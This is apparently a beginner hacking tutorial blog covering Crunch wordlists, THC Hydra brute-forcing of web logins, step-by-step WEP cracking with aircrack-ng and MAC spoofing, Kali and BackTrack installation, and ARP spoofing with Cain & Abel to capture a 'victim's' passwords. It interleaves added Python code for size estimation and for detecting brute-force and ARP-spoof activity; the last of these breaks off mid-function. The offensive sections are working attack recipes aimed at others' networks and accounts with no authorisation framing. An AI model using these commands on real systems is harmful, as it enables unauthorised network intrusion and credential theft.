Wednesday, 16 March 2016

Wordlists With Crunch

This tutorial is going to introduce you to a BackTrack application called Crunch. In a nutshell, Crunch is a wordlist generator: you specify a standard character set or a custom one, and Crunch builds your wordlist from it. Crunch can generate all possible combinations and permutations. It is mainly used for brute-force attacks and WPA/WPA2 WiFi cracking. In this tutorial I explain some of its main features, options and settings.
►How to Download, Extract and Install
Open up a terminal and type (you can google “Download Crunch” and copy-paste the URL instead of typing it):
»wget http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.4.tgz
Once downloaded, we need to extract it.
»tar xvf crunch-3.4.tgz
Now we need to get into the directory that was just extracted and actually install it. Type:
»cd crunch3.4/
To compile and install, type the following two commands one after the other:
»make
»make install
►How to use Crunch
Once installed we can start generating our wordlists right away. Let’s start with a basic example:
»./crunch [minimum length] [maximum length] [charset / extra options]
For example:
»./crunch 1 5 abc123 -o wordlist.txt
First of all we specify that we are using Crunch by typing “./crunch” (its path). After that we specify a minimum length of 1 and a maximum of 5. The -o [filename] option saves all generated combinations to a plain text file. The “abc123” are the characters that we want the wordlist to contain. When you press enter on the above command you will see some calculations that Crunch performs using basic rules of permutations and combinations: it tells you how much disk space will be required and how many lines (words) the text file will consist of, and it reports its progress as it creates the wordlist.
Similarly, with a modified version of this example we can create a wordlist containing all possible phone numbers. Depending on where you live, say if phone numbers are 10 digits long, you set both the minimum and the maximum length to 10.
Apart from that, when setting up the character set, symbols have to be escaped with a backslash “\”. That is, whenever you want a symbol in your wordlist, put a backslash in front of it so that the konsole doesn’t get confused. (You don’t need to do this for numbers and letters.)
For example:
»./crunch 1 5 abc\!\*\( -o wordlist.txt
In this example the backslashes themselves are not part of the wordlist; Crunch only receives the symbols they protect, and uses those in making the wordlist.
Moving on, permutations can be created by using the -p switch between words, letters, numbers or symbols.
»./crunch 0 0 -p a b c
The above will create:
abc acb
bac bca
cab cba
Although a little knowledge of basic mathematics would help here, it is fairly easy to understand. When you use the permutation option there is just one thing different: it doesn’t allow repeating characters. Setting a character set normally throws every character into every possible position; use permutation if you are certain that you don’t want repeated characters. One thing you might have noticed is that we still set a min/max length even though we use a permutation. As in this example, just using 0 as the length will get you the required list without any problems (it simply uses everything it has). You can always set it according to your preference.
[Math, you can skip this] In that example we used 3 words, which gives a permutation of three: 3 objects taken 3 at a time. In other words 3P3 = 3 × 2 × 1 = 6 possible arrangements (without any repetition). For our purpose, we can simply think of it as a factorial.
►Splitting generated combinations into separate lists with a predefined size:
If you ever need to, Crunch provides an option to create several lists, each of an exact size. For this purpose we have the -b switch, which sets the size of each file. So whenever the combinations Crunch generates exceed, for example, 10mb, it will place the next word into a separate file and go from there.
»./crunch 1 8 abcdABCD -b 30mb -o START
This will split all the generated combinations of “abcdABCD” in separate files, none exceeding the size of 30mb.
As always, practice is the key. This is another one of those things which you don’t quite get the hang of until you actually rub noses with it. If ever you have a doubt as to what any command does, best way to find out is to just try it out. Take a look at the help menu, or the official documentation for all the options and try out as many combinations as you can.
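To see the “calculations that Crunch performs” for yourself, here is an added example (my own Python, not code from the Crunch project) that estimates a wordlist’s line count and size before you generate it, shows why -p produces only 3! = 6 words for a b c, and works out how many files a -b limit will split the output into. The kb/mb/gb multipliers are an assumption (powers of 1000); everything else is plain counting.

```python
"""Estimate a Crunch-style wordlist before generating it.

Added example, not code from the Crunch project. It reproduces the kind of
size calculation the tutorial says Crunch prints (lines and bytes), shows
why the -p mode yields far fewer words than a normal character set, and
works out how many files a -b limit splits the output into.
"""
from itertools import permutations, product
from math import ceil, factorial


def wordlist_size(charset, min_len, max_len):
    """Lines and bytes for every string of length min_len..max_len over
    charset (assumed to hold distinct characters), repetition allowed,
    one word per line followed by a newline."""
    n = len(charset)
    lengths = range(min_len, max_len + 1)
    lines = sum(n ** k for k in lengths)
    size = sum(n ** k * (k + 1) for k in lengths)  # k chars + '\n'
    return lines, size


def generate(charset, min_len, max_len):
    """Yield the words: shortest length first, then in charset order."""
    for k in range(min_len, max_len + 1):
        for combo in product(charset, repeat=k):
            yield "".join(combo)


def permutation_count(items):
    """Words produced by `crunch 0 0 -p ...`: every ordering of the given
    items with each used exactly once, i.e. len(items)! (3P3 = 3! = 6)."""
    return factorial(len(items))


def permutation_words(items):
    """The words the -p mode emits for the given items."""
    return ["".join(p) for p in permutations(items)]


def parse_size(spec):
    """Turn a -b style size such as '30mb' into bytes. Assumption: kb, mb
    and gb are powers of 1000 here; check Crunch's man page for its own
    convention before relying on the exact file count."""
    units = {"kb": 10 ** 3, "mb": 10 ** 6, "gb": 10 ** 9}
    spec = spec.strip().lower()
    for suffix, mult in units.items():
        if spec.endswith(suffix):
            return int(spec[: -len(suffix)]) * mult
    return int(spec)


def files_for_limit(total_bytes, limit):
    """Number of files when -b <limit> splits total_bytes of output
    (the last file is usually smaller than the limit)."""
    return ceil(total_bytes / parse_size(limit))


def report(charset, min_len, max_len, limit=None):
    """One-line summary in the spirit of the banner Crunch prints."""
    lines, size = wordlist_size(charset, min_len, max_len)
    text = f"{lines} lines, {size} bytes ({size / 1e6:.1f} MB)"
    if limit:
        text += f", {files_for_limit(size, limit)} files at -b {limit}"
    return text


if __name__ == "__main__":
    print("crunch 1 5 abc123           ->", report("abc123", 1, 5))
    print("crunch 0 0 -p a b c         ->", permutation_words(list("abc")))
    print("crunch 1 8 abcdABCD -b 30mb ->", report("abcdABCD", 1, 8, "30mb"))
```

The same arithmetic is what makes an exhaustive search expensive: every extra character in the set or the maximum length multiplies the count, which is why the phone-number list above is feasible (10 digits, one length) while a full printable-ASCII set quickly is not.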

THC Hydra

One of the biggest security holes in any seemingly secure network or system is passwords. Install a $500 anti-virus, hire a dedicated cyber security team, do anything and everything you can, but if your password is weak none of it will matter. THC-Hydra is a famous login cracker which supports numerous protocols. It is relatively easy to use and a highly efficient brute-forcer (well, as efficient as a brute force attack can be). Although brute-force attacks are somewhat uncommon and never a recommended attack strategy, sometimes we just don’t have a choice. That’s where THC-Hydra comes in. (By the way, THC = The Hacker’s Choice.)
►Installing Hydra – Much like Nessus, Hydra needs a few formalities before we can actually use it. We need to download, extract, install and configure it. (We can do this in just a few commands.) So let’s begin:
Open up the terminal(konsole) and type:
»wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
Once downloaded we now need to extract it:
»tar -xvf hydra-6.3-src.tar.gz
Now, configure and compile (wait for the first command to complete), then install with the second:
»./configure && make
»make install
►Using THC Hydra
(Note: if you are attacking an FTP service, first make sure to run an nmap scan for any open FTP ports (by default it should be 21).)
Now in order to brute-force a specific login form you need to set a username; for example a lot of networks use ‘admin’, and the admin account usually has the most privileges. (If you don’t know the username you can supply a text file containing possible usernames.) You also need a password wordlist, the service used for attacking and the page itself. (Read on.)
Specifying all these parameters, the attack command will look something like:
»./hydra -l admin -P /root/Words.txt website.com http-post-form "/login.php&username=^USER^&password=^PASS^"
First, you need to let the konsole know you are using Hydra, hence the “./hydra”. Next you need to set up the various parameters and variables. The general format is to first type the “switch”, for example ‘-l’ or ‘-P’, and then, after a space, the string or the value. The various parameters are given below:
►-l = The username
►-L = A list of usernames (if you don’t know the login).
►-p = The password
►-P = The path to the password wordlist
(The -p parameter is almost never used: why would you want to brute force if you already know the password? -P is used almost always.)
If we’re attacking a web form over HTTP and the method is POST then we use “http-post-form”. Another example: if the service is FTP, simply use “ftp”. You will have to sniff around the website that you want to get access to and find out exactly what it uses. Such information may be found in the URL or the “About” page, or can be googled. (You can also right click the page and click “View Source”.)
Another thing you should be aware of is that the variables for username and password are not always the same. They differ depending on the website or service you are using. What I mean by this is that while one website uses ‘admin’, another might be using ‘administrator’. Viewing the page source, you can generally find out easily which variable they store the values in.
This was a rather small example. Like every other tool, Hydra has a variety of parameters and options that can prove very useful in different cases, more than can be discussed here. (The help output can help you explore, but there’s no substitute for actually experimenting.)
The parameters discussed above are the ones most often used. Below are a few less common ones:
►-vV = Verbose mode. Shows you every login attempt Hydra tries.
►-s = Specifies the port on which we’re running our attack.
►-x = Brute-force password generation. We define our charset and its minimum and maximum length.
►-R = Restores a previously aborted session of an attack.
►-e ns = Checks for blank or no password fields.
So an example of an advanced attack would look something like this:
»./hydra -L /root/usernames.txt -P /root/HugeDB.txt -e ns -vV -s 80 website.com http-post-form "/login.php&username=^USER^&password=^PASS^"
(That’s all one command, on one line.)
Try deciphering what exactly this command does.
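From the other side of the wire, the attack above leaves an obvious trace: one POST to /login.php per guess. Here is an added example (my own Python, not part of Hydra or of this tutorial) that reads web server access log lines in Apache combined format and flags any source address that reaches a threshold of login POSTs within a sliding time window. The log lines are constructed for the example, the login path is the one from the command above, and the threshold and window are placeholders you would tune for your own site.

```python
"""Spot a Hydra-style login brute force in a web server access log.

Added example, not part of Hydra or of this tutorial. The command above
sends one POST to /login.php per guess, so the defender-side signal is a
burst of POSTs to the login path from a single source. The log lines are
constructed in Apache "combined" format; 203.0.113.x and 198.51.100.x are
documentation address ranges, not real hosts.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

SAMPLE_LOG = [  # constructed: six guesses in six seconds from one address
    '203.0.113.7 - - [16/Mar/2016:10:15:00 +0000] "GET /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Mar/2016:10:15:00 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [16/Mar/2016:10:15:01 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Mar/2016:10:15:01 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Mar/2016:10:15:02 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Mar/2016:10:15:03 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Mar/2016:10:15:04 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Mar/2016:10:15:05 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [16/Mar/2016:10:15:30 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does
    not match (truncated lines, other formats)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_bursts(lines, login_path="/login.php", threshold=5, window_s=60):
    """Return {ip: peak} for every source that sent at least `threshold`
    POSTs to login_path inside any `window_s`-second window; peak is the
    largest count seen. Lines must be in time order, as a log file is.
    Status is deliberately not filtered: a failed login usually comes back
    as 200 (the form is re-rendered), so the rate is the signal."""
    recent = defaultdict(deque)  # ip -> timestamps of recent login POSTs
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()  # drop attempts that fell out of the window
        if len(q) >= threshold:
            peaks[rec["ip"]] = max(peaks.get(rec["ip"], 0), len(q))
    return peaks


if __name__ == "__main__":
    for ip, peak in find_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {peak} login POSTs within 60 s, likely brute force")
```

A rate rule like this is what account lockout, login throttling and tools such as fail2ban act on; the -L username list in the advanced command spreads guesses over many accounts, so counting per source address rather than per account catches that variant too.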

Hacking WEP – II

([For this tutorial you need external WiFi adapter] OR [have BackTrack installed in your Hard Drive, not a virtual machine])
(Otherwise, look for the method using normal windows OS in the intermediate section)
Open up BackTrack, log in and then follow the steps below.
1. Open konsole and type the following to start up networking.
»/etc/init.d/networking start
2. Now we are going to put the network card into monitor mode. Start by typing the following.
»airmon-ng
(You will find your Interface here)
3. Then start monitor mode on that interface:
»airmon-ng start wlan0
or
»airmon-ng start wlan1
(this depends on what your wireless card shows up as; replace as needed)
4. Let’s spoof your MAC address first by typing these commands.
»ifconfig wlan1 down
»macchanger -r wlan1
»ifconfig wlan1 up
This changes the MAC address that the network we are connecting to will see.
5. Time to start finding our victim’s router; type the following in konsole.
»airodump-ng mon0
This will show the entire list of all the WiFi networks your adapter can pick up. Once you find one that suits your interest, continue:
6. Once found, press CTRL + C to get out of airodump, note down the BSSID and then type into a new konsole (read slowly!):
»airodump-ng -c [channel number] --bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)
For example: »airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w Newcapfile mon0
(*IMPORTANT: you have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID and channel number from the previous steps, ‘mon0’ or ‘mon1’ depends on your adapter, and for the name of the cap file you can type in any file name like ‘MyCapFile’.)
7. Let’s start the passphrase cracking. We need to get around 30,000-50,000 IVs (packets). We start by sending fake authentication requests. To do this open a new konsole and type:
»aireplay-ng -1 1 -a [The BSSID of the router] mon0
example: »aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
8. Almost done, we just need to continue the capturing process. Open another konsole and type:
»aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution protocol, it is needed to find the device address from the IP address)
Collect a good amount of IVs, around 30,000-50,000 (the more the better). (Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours.) They are stored in the .cap file. Once you’ve captured enough packets, press CTRL + C to stop the process and continue to step 9.
9. Time to start cracking that cap file 😀 You can think of it like this: every single packet contains a bit of leaked password. So we’ve captured a large number of packets, compiled them in the .cap file, and now we’re going to try to find those tiny bits of information in each packet and piece them together to give us the passphrase. Open a new konsole and type:
»aircrack-ng -b [bssid] [file name]-01.cap
example: »aircrack-ng -b 11:22:33:44:55:66 wepcap-01.cap
10. Wait a few seconds and we should now be presented with the key to log in to the router.
Key Commands.
►wlan0 = Interface (Examples: wlan0, ath0, eth0)
►ch = The channel the target is on (Examples: 6, 11. You can find out using your wifi adapter’s interface)
►bssid = MAC address of target (Example: 11:22:33:B1:44:C2)
►ssid = Name of target (Examples: linksys, default)
►filename = Name of .cap file (Examples: wep123, target, anythingyouwant)
►fragment-*.xor = The * being replaced by a number (Example: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Installing Kali

Around April 2014, www.backtrack-linux.org officially stopped supporting BackTrack downloads. This was mainly due to the release of Kali 1.0.6, which fixed the majority of the bugs in the OS. Although BackTrack is still available through torrents, it’s better to move on to newer and better things, namely Kali.
In a nutshell, mathematics tells us the difference between Windows 8 and Windows 8.1 is 0.1. Similarly, BackTrack and Kali are not that different. Kali is like the next revamped version of BackTrack. If you prefer to keep using BackTrack, you’re not exactly missing out on something huge (yet). But still, it’s always better to use up-to-date software, and nobody knows that better than us hackers. BackTrack ruled the hacking universe for nearly 8 years (released in 2006) and now the torch is in the hands of Kali. So, here we’ll be taking a brief look at the two operating systems, their differences, the advantages of Kali over BackTrack and finally how to install Kali.
Differences between Kali & BackTrack
Like I said, Kali is not so different than Backtrack. At first look, you’ll probably notice the slight GUI change. The tools are in different places but it shouldn’t take long to get used to. One major difference beginners may not notice is that Kali is built on Debian Linux instead of Ubuntu Linux. The Debian vs Ubuntu debate is a whole other topic, so we’re not getting into that. Plus, you don’t need to fill your head with unnecessary information. Kali can be thought of as the next iteration of Backtrack. The developers are the same, the functionality is almost the same and the GUI change is definitely for the better.
The advantages of Using Kali Over BackTrack
•’Some’ new tools.
•The new GNOME interface.
•Regular updates, updated tools like Metasploit, p0f etc.
•A build specifically designed for the ARM architecture (read: compatible with Android smartphones).
•All tool directories are in the PATH variable, so any tool can be called from anywhere.
(Also now that backtrack has no future, we don’t have that much of a choice)
There’s no game changer advantage of Kali over Backtrack. But now that Backtrack is no longer going to update, vulnerabilities will start popping up in the OS which will be fixed in Kali but not Backtrack. The last thing a hacker needs is to get hacked him/herself. Let’s install Kali now. If you’ve installed Backtrack earlier, the installation process of Kali is practically identical.
Step 1: Download & Burn Kali
Head over to: http://www.kali.org/downloads/
There are quite a few options, the only ones you need to worry about are 64 bit or 32 bit and torrent or direct download. Check out the properties page of your ‘My Computer’. If your architecture (OS and processor) are 64 bit, download the 64 bit one. If you’re not sure, you may simply download the 32-bit version which works on all systems. (If you have 4GB or less RAM, 32 bit or 64 bit doesn’t make a difference). The download is around 3GB in size.
Below on that page you’ll see two more versions, ARMEL and ARMHF. They are relevant when installing Kali on ARM hardware devices (like Android smartphones and tablets). But, right now we’re trying to get Kali running on a PC.
Once we’ve got the ISO file, you can either burn it to a DVD to install as a permanent OS on your system or you can create a bootable USB Drive using software like UNetBootin. (See the tutorial on Backtrack for exact instructions)
Step 2: Install Kali
We’ll be installing Kali on a Virtual machine. The two best virtualization systems are VMWare and Virtual Box. They are both equally good, but VMWare is paid. So, for a beginner hacker I recommend using Virtual Box. On startup, just like BackTrack, you can log in as “root” with a password of “toor”. Then, type “startx” to start the X-Windows system.
Using a virtual machine may not always be ideal. The main disadvantage is performance. Running an OS on top of another OS is bound to cause lagging. A system with 4GB RAM should handle it sufficiently well as long as no other programs are running. For optimal performance, 6GB (or more) RAM is recommended.
Further, for wireless hacking using a virtual machine, we need an external wireless card or adapter. They are usually small pen drives using which you can connect to a wifi network. Also, they must be compatible with aircrack-ng, the main wifi hacking software.
As mentioned before, you may also install it alongside your present OS so that both of them can mind their own business one at a time. To do that, you can use your burned DVD or USB drive and simply boot with the booting device jacked in. (You may need to alter the Booting Sequence through the BIOS menu).
Once the booting begins, you can click on the Install Kali button and follow the steps in the install wizard.
The disadvantages of using a VM are the advantages of using a dual boot system. Kali will run faster with less resources, you will not need an additional wireless card and you will not have the additional complexities of working in a VM. But installing another permanent OS may not be ideal for everyone. You may choose whichever method you like. If you have used another Linux distribution with the GNOME interface, you’ll notice that the pull-down menus at the top of the desktop look familiar, just like Backtrack. Also just like backtrack, we can find all the same tools (and some new ones) in the same upper left corner applications menu categorized in the same way. One interesting menu is the “Top Ten Security Tools” menu. You’ll find that it includes some of the most popular tools such as nmap, Metasploit, sqlmap, Wireshark, and aircrack-ng among others. Now you’re all set and you can start hacking with Kali Linux!
*Since Kali officially supports ARM hardware, almost all android devices can run Kali. There’s an app called ‘Linux Deploy’ on the play store which does all the heavy lifting for us. All we need to do, is set a few options and hit install. The requirements for installing Kali on android phones are : Minimum android version 2.1 (rooted), 5GB free space in any one place (internal or external storage), decent internet speed and some patience.
Here’s the URL for the Linux Deploy app:
https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy
And here’s the official tutorial for getting Kali up and running on your smartphone:
http://www.kali.org/how-to/kali-linux-android-linux-deploy
Linux Deploy basically lets the user select which Linux distribution they want to install, the processor architecture, mirror URL, installation path etc. If you simply want to get it up and running quickly, Linux deploy provides defaults that almost always work. Although very improbable, even if something does go wrong, the installation of Kali on your android phone is completely reversible. On hitting the Install button, Linux Deploy will start downloading the image file and then go on to install it.
For exact instructions, head to the official tutorial URL given above.
A few pointers: make sure you select Kali Linux under the distribution tab. The download is approximately 2GB in size, so plan accordingly. There are two architecture types, ARMEL and ARMHF. ARMEL is for the ARMv4 instruction set and ARMHF for the ARMv7 instruction set of the phone’s processor. The majority of phones today have ARMv7 (or above), but if you have a relatively old model, you may wish to google your phone’s specifications to find out which one you can run. One last thing: around 4GB minimum is recommended for the image size, but if you plan on installing a lot of tools you can manually change the image size in Linux Deploy.

Installing Backtrack

How to Install BackTrack 5 (contents)
►Download the BackTrack 5 ISO
►Setting up a Virtual Machine
►Installing BackTrack 5
►BackTrack Login
►(Optional) Creating a Bootable USB Drive
►Download the BackTrack 5 ISO
Head over to: http://www.BackTrack-linux.org/downloads/ Then click the download button.
After that, you need to pick the version of BackTrack that you want. Pick the latest one; it’s BackTrack 5 R3 at the time of writing this tutorial. The window managers (KDE and Gnome) are both pretty much equal, choose either. Pick the architecture according to your system’s specs (right click on My Computer to find out whether it is 32 bit or 64 bit). We want the ISO file type because we can use it on a DVD or a USB flash drive and install it on a virtual machine. Direct download or torrent download is up to you. The file is a little over 3 GB, so it may take some time depending on your internet speed.
(You’re now setting up a whole new operating system, which takes time, so I suggest you read this tutorial once completely before beginning and then refer to it if you get stuck; it’s relatively easy.)
►Setting up a Virtual Machine
A virtual machine (VM) is the software implementation of a physical computer. In other words, it’s having another computer on your current computer. If you have never used a virtual machine it is a good time to start. VMs are excellent when it comes to practicing your hacking techniques as they provide somewhat of a safe closed environment, such that any damage, if it occurs is contained within the dummy operating system, which can then be simply restarted to start afresh.
To start, you’re going to need to get VM software. There are many out there, here are a few popular ones.
VMware Player (Windows/Linux) – Free
VirtualBox (Windows/Mac/Linux) – Free
Whichever VM software you go with, make sure it has a way to network with other VMs. If you don’t want to spend the money, go with VirtualBox. If you plan to get serious with penetration testing, you might want to consider getting a VMware Workstation license. It is full of useful tools and goodies such as sharing VMs and remote access and easy to work with. The easiest to install is ‘Windows Virtual PC’, it will do for beginner purposes. These programs are very similar in function. You shouldn’t have trouble following the basic setup instructions.(Google any Virtual machine software and install it)
After everything is installed and running, click “Create new virtual machine”. (Depending on which one you install, the instructions might be a little different. If you look around there will definitely be similar options).
Next you’re going to select “Installer disc image file” then browse for the BackTrack 5 ISO.
Select the operating system as linux, and the version as Ubuntu.
Give the virtual machine a name such as “BackTrack 5 R3” and select a location for where you want to save the virtual machine files.
When asked how big you want the virtual disk drive to be, you want at least 25 GB. This will be the most demanding requirement of BackTrack 5. Although the BackTrack-linux wiki says you need at least 20 GB, I found you will run out of space by the time you install updates or any other software. (Feel free to put in even 5-15 GB if you simply want to look around. The OS is not that big, the tools are.) Then, you will have the option of storing the virtual disk as a single file, or split into multiple files. Creating a virtual disk as a single file will allocate all of the space right away. Splitting into multiple files means the drive files will grow as you need them. So if your hard drive space is limited on your host system, go with multiple files. If you have a massive drive and are not worried about space, go with a single file.
And that’s it! The virtual machine is ready to go. The recommended minimum RAM is 512 MB, however you can try lower if you need to.
Power on the virtual machine and you will be ready to install BackTrack.
►Installing BackTrack 5
If you are installing on a hard drive, you will need to burn the BackTrack 5 ISO on to a DVD or a USB Drive.
First turn on your machine, then insert your DVD or USB drive. Then press the key that allows you to select your boot drive. You may have to go into the BIOS to enable this. Most often, F12 will work. Select either your DVD drive or your USB drive to boot from it. (You may simply use the ISO file as well. Windows Virtual PC, for example, gives an option to simply select an ISO file and start up directly.)
After a few moments, you will see BackTrack Live CD menu. Press enter on ‘BackTrack Text – Default Boot Text Mode’.
Wait about 10 seconds, and you will come to BackTrack shell console. Type the command “startx” to load the GUI.(If you directly used the ISO file without burning it to anything, your operating system will be now ready. If you prefer to burn the file to a DVD or pen drive follow the steps below)
After another few moments, you will come to the desktop of BackTrack. Double click on the “Install BackTrack” to begin the install process.
After you select your time zone, and language, you then have to partition your drive. If you are using a virtual machine, go ahead and use the whole drive. If you are dual booting, you will have to specify your partition for your two operating systems.
Continue through the installer, and then click finish. BackTrack will then install on to your system. This process takes about 10-15 minutes.
►BackTrack Login
After it is finished, restart your system.
After restarting, you will come to a login screen.
The default root name for BackTrack is “root” and the password is “toor”. After typing in the root username and password, you will come back to the BackTrack shell. Type “startx” to enter the GUI desktop, and we’re done! I recommend you look around and get a feel for all the tools and applications that come pre-installed on the amazing BackTrack OS.
►(Optional)Creating a Bootable USB Drive
Required Items:
A USB flash drive with minimum space of 4 GB.
BackTrack 5 ISO
UNetbootin – ( http://unetbootin.sourceforge.net/ )
UNetbootin is a program that allows you to create bootable USB drives for linux distros and Windows. UNetbootin will download the distribution or use an ISO file you selected from your hard drive.
Once UNetbootin is downloaded you can run it by double clicking (Windows), plug in your USB Drive.
Start UNetbootin and select the “diskimage” option, then select your BackTrack 5 ISO.
Select your USB Drive, then click “OK”.
(WARNING: This will format your USB Drive and remove all previous data.)
Now you should be able to boot off of your USB Drive with BackTrack 5.

More On Hacking WiFi

This article is fairly basic but it should give you some good background information of where and how to start and how WiFi hacking works.
Before all that, let’s take a look at some background information about the stuff involved in hacking WiFi.
IP Addresses:
People starting off in networking often get confused by this, yet it is one of the most important and vital pieces of information you will use and need. Each computer system has 2 types of the so-called IP address: internal and external.
The external IP address is what your ISP assigns to your modem. The external IP address is NOT required in wireless hacking.
The internal IP address is what will be used in wireless network hacking; it is the IP address which the actual hardware router assigns to each computer. Unless specified in the router/computer settings, IP addresses are dynamic, so nearly every time a computer disconnects and reconnects to the router its IP will be different.
Basic software for someone interested in Networking is an IP Scanner. Most Networking software e.g. Cain, which I will go into further, includes an IP Scanner. There are lots of Scanners out there and a quick search on google will bring up a few good ones too.
Wireless Network Hacking:
There are several different types of encryption out there, but since this is a basic guide I will focus on just one and mention the other.
The one I will be focusing on here is WEP (Wired Equivalent Privacy) encryption. Hopefully, you’re not protecting your network with this, if you are, I guarantee you will soon be in a hurry to change it. See for yourself, Read on ! WEP has been demonstrated to have numerous flaws and therefore the industry is basically forcing people to change to WPA/WPA2 encryption (by limiting speed between computer and router to 54mbps on wireless routers).
The exact details of how the WEP encryption works are a bit too technical to be discussed here, All you need to know is that WEP is extremely vulnerable. (If possible, change it to WPA/WPA2 ASAP!)
MAC Filtering:
Before WPA/WPA2 came to the market and was added as a standard encryption method to routers, many people resorted to Mac Filtering as an extra layer of security.
A MAC address is just an identification string made up of numbers and characters which every device that connects to a router has. So that is all Network Adapters. MAC filtering works by only allowing computers with a certain MAC address to connect to the router. However this can be easily overcome by spoofing your MAC address with simple software which I will go into later.
The fastest and most effective way to hack a wireless WEP Network is with a piece of incredible software called Aircrack-ng (http://www.aircrack-ng.org/).
(For more info on Cracking WEP, press the back button and check out the tutorial on “Cracking WEP”.)
Once you’re in the network. The real fun begins.
Intercepting Network Information:
When information is sent anywhere on a network, it is split into fixed-size “packets”. These packets are what you will be intercepting.
We will look at the main type of attack, which is also the easiest. It uses a piece of software called Cain & Abel (http://www.oxid.it).
Once installed, run the application. It may be flagged by some anti-virus programs and may also come up with a message claiming your firewall is restricting its access. In most cases both of these are errors.
You have 2 toolbars at the top. The top one with File/View/Configure/Tools/Help and the second one. The 2 main buttons you will need are located on the second toolbar and are the second and third from the left. One that looks like a motherboard (Starts/Stops Sniffer) and the other one that looks like a Nuclear icon (Starts/Stops APR).
Go ahead and click the Sniffer button located on the second toolbar, second from the right. Then click the Sniffer tab and make sure Hosts is selected at the bottom. Then right click anywhere in the white area and click “Scan MAC addresses”. Click OK. Once this is done, if there are other computers on your network they should appear in the listbox. Highlight them all, right click and select “Resolve Host-Name”. This is basically an IP scanner, as I mentioned before, giving the internal IP address and the host name on the right to help you identify your slave.
Now you need to find out your gateway address which is the IP Address of your router. Go into CMD and type IPCONFIG and look for the gateway address. An example would be 192.161.1.1
Once thats done. Click on APR on the bottom tab. The page should now be divided into 3, with aload of APR tools on the left and then 2 separate listboxs on the right. Click on the top listbox and you will notice that on the second toolbar, that there is a blue plus icon 7 from the right. Click that.
Now a pop up with 2 listboxes will appear. On the left select your gateway Address and then on the right select your victims IP Address. Then select OK. You will now notice that they appear in the top listbox. Click on them and make sure its highlighted. Now click the Nuclear icon on the second toolbar 3 from the left. It should now start poisoning the other computer meaning all the traffic to and from that computer is going through your computer. This is called ARP spoofing. It is a computer hacking technique whereby an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages onto a Local Area Network. ARP spoofing allows us to intercept data frames on a LAN.
If the person is active on the computer using the network you will see the second listbox start filling up with routed packets. If you click the Passwords tab at the bottom, any password they enter on an unencrypted website will show up in that box. HTTPS/SSL websites, which are encrypted, will usually show up as a random string or nothing at all. Often, when someone is spoofing a slave and the slave visits an HTTPS website, commercial browsers will show a certificate warning, because the browser cannot verify the server’s certificate when the software tries to replace it with a fake one. This can make the slave suspect an intrusion.
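The poisoning described above has a visible signature on the wire: the gateway’s IP suddenly starts being advertised with a different MAC, and one MAC ends up claiming several IP addresses. The following is an added example (not code from the tutorial or from Cain) of a small monitor that applies those two checks to a constructed log of ARP replies; the log format (`timestamp sender_ip sender_mac`) and all addresses are made up for the example.

```python
"""Detect ARP cache poisoning from a log of ARP replies.

Added example, not part of the original tutorial. Two heuristics are applied
to each ARP reply seen on the LAN:
  1. the MAC bound to an IP changes mid-stream (HIGH if the IP is the gateway);
  2. a single MAC claims more than one IP address.
"""
from collections import defaultdict

# Constructed sample log: "timestamp sender_ip sender_mac" per ARP reply.
# The gateway 192.168.1.1 really lives at aa:aa:aa:aa:aa:01; at 10:00:10 a
# second host (cc:cc:cc:cc:cc:99) starts claiming both the gateway and a client.
SAMPLE_ARP_LOG = """\
10:00:01 192.168.1.1 aa:aa:aa:aa:aa:01
10:00:02 192.168.1.20 bb:bb:bb:bb:bb:20
10:00:03 192.168.1.1 aa:aa:aa:aa:aa:01
10:00:10 192.168.1.1 cc:cc:cc:cc:cc:99
10:00:10 192.168.1.20 cc:cc:cc:cc:cc:99
10:00:11 192.168.1.1 cc:cc:cc:cc:cc:99
"""


def parse_arp_line(line):
    """Split one constructed log line into (timestamp, ip, mac)."""
    ts, ip, mac = line.split()
    return ts, ip, mac.lower()


def detect_arp_spoof(log_text, gateway_ip):
    """Return a list of alert strings for the suspicious events in log_text."""
    alerts = []
    ip_to_mac = {}                    # last MAC seen for each IP
    mac_to_ips = defaultdict(set)     # every IP each MAC has claimed
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
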